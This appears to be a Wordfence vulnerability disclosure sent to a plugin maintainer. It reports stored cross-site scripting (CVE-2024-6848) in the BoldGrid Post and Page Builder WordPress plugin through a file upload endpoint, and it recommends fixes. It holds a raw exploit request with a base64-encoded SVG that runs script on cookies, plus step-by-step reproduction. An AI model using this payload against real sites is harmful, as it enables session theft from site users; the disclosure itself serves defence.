Vulnerability - Stored Cross-Site Scripting via File Upload

[nicolepaschen]

Hello,

We have a new vulnerability to responsibly disclose to you, and the details are outlined below.

Please note that this issue was discovered and responsibly reported to us by wesley (wcraft). Any credit for the discovery of the vulnerability should be granted to them.

Vulnerability Title: Post and Page Builder by BoldGrid Visual Drag and Drop Editor <= 1.26.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via File Upload
CVE ID: CVE-2024-6848
CVSS Severity Score: 6.4 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Organization: Wordfence
Vulnerability Researcher(s): wesley (wcraft)
Software Link(s): https://wordpress.org/plugins/post-and-page-builder

Description
The Post and Page Builder by BoldGrid Visual Drag and Drop Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file uploads in all versions up to, and including, 1.26.6 due to insufficient input sanitization and output escaping affecting the boldgrid_canvas_image AJAX endpoint. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.

Proof of Concept
https://doc.clickup.com/9011113249/d/h/8chnb91-7091/2f5466b53f28678

Summary
A Stored Cross-Site Scripting (Contributor+) vulnerability has been identified in the plugin https://wordpress.org/plugins/post-and-page-builder/ <= 1.26.6, through the AJAX endpoint boldgrid_canvas_image.

Steps to Reproduce:
Payload:
Request Raw:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: YOUR_HOST
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://wpcraft.com:1337/wp-admin/edit.php?post_type=bg_block
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: YOUR_COOKIES
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 602

action=boldgrid_canvas_image&boldgrid_gridblock_image_ajax_nonce=YOUR_NONCE&image_data=data:image/3gp2;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDEuMS8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9HcmFwaGljcy9TVkcvMS4xL0RURC9zdmcxMS5kdGQiPgo8c3ZnIHZlcnNpb249IjEuMSIgYmFzZVByb2ZpbGU9ImZ1bGwiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+CiA8cG9seWdvbiBpZD0idHJpYW5nbGUiIHBvaW50cz0iMCwwIDAsNTAgNTAsMCIgZmlsbD0iIzAwOTkwMCIgc3Ryb2tlPSIjMDA0NDAwIi8+CiA8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+CiAgYWxlcnQoZG9jdW1lbnQuY29va2llKTsKIDwvc2NyaXB0Pgo8L3N2Zz4K

1. Install the plugin https://wordpress.org/plugins/post-and-page-builder/.
2. Authenticate with a (Contributor+) account.
3. Go to /wp-admin/post-new.php?post_type=bg_block, open the browser's developer tools, and look in the HTML for the JavaScript variable grid_block_nonce. Note the nonce.
4. Construct the request using the noted nonce, making sure to use the correct cookies and host, and send the request.
5. Copy the URL from the response and access it to execute the XSS, triggering an alert(document.cookie).

Any Known Public References
https://plugins.trac.wordpress.org/browser/post-and-page-builder/tags/1.26.6/includes/class-boldgrid-editor-ajax.php#L372
https://wordpress.org/plugins/post-and-page-builder/#developers

Recommended Solution
We recommend sanitizing the contents of files and restricting the types of files that can be uploaded by checking file extensions and MIME types against a whitelist of allowed file types and the validation of the file content and metadata provided by the user, such as file size limits and naming conventions.

Uploaded files should be stored securely, preferably outside of the web root directory or within a directory that has restricted access controls. Filenames should be randomly generated to ensure they are unguessable and not susceptible to manipulation by malicious users. Before storing the files, filenames should also be sanitized to remove any special characters or potentially harmful code.

---

As per our standard disclosure process, we may notify our customers and the general public about this vulnerability according to the timeline outlined here: https://www.wordfence.com/security/. We may confidentially notify interested parties both inside and outside our organization before the announcement date. To avoid an accelerated disclosure timeline, please acknowledge receipt of this report within 14 days.

You should be aware that other researchers may independently discover this vulnerability and announce it prematurely. You should also note that this vulnerability may be exploited in the wild already. For these reasons we encourage you to release a fix as soon as possible to help protect your customers.

As a courtesy we ask that you notify us as soon as you release a fix to your customers. Please let me know if you have any questions.

Tiffany Tyson
Customer Support Engineer
wordfence.com | defiant.com